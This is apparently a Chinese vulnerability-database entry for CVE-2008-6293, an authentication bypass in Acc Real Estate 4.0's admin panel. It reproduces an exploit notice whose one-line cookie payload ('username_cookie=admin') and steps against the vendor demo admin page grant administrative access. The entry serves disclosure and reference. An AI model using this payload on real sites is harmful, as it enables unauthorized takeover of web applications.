Acc Scripts Real Estate 'admin/Index.php'权限绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1183565 漏洞类型 权限许可和访问控制
发布时间 2009-02-26 更新时间 2009-02-26
CVE编号 CVE-2008-6293 CNNVD-ID CNNVD-200902-588
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2009030066
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-588
|漏洞详情
AccRealEstate是一个房地产网站专业的解决方案。AccRealEstate4.0版本的admin/Index.php允许远程攻击者通过username_cookie到"admin",绕过权限并获得管理访问权。
|漏洞EXP
###########################################################################
      ______    __  __   ______          __                ______                   
     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/ 
        /____/                                           

# [~] Discovered by : Hakxer
# [~] Type Gap : Acc Real Estate v4.0 Insecure Cookie Handling
# [~] Script : http://www.accscripts.com/realestate/admin-area-specifications.html
# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
##########################################################################

Bug In : /admin/Index.php
   
   PoC : javascript:document.cookie="username_cookie=admin";
   
   [~] Admin panel 
   http://www.accscripts.com/realestate/demo/admin/index.php
   [~] Execute JS Code javascript:document.cookie="username_cookie=admin"; 
   [~] Refresh
		

#  Proud To be a Muslim #
#_=END=_#

|参考资料

来源:XF
名称:accrealestate-cookie-auth-bypass(46290)
链接:http://xforce.iss.net/xforce/xfdb/46290
来源:BID
名称:32078
链接:http://www.securityfocus.com/bid/32078
来源:MILW0RM
名称:6964
链接:http://www.milw0rm.com/exploits/6964
来源:SECUNIA
名称:32517
链接:http://secunia.com/advisories/32517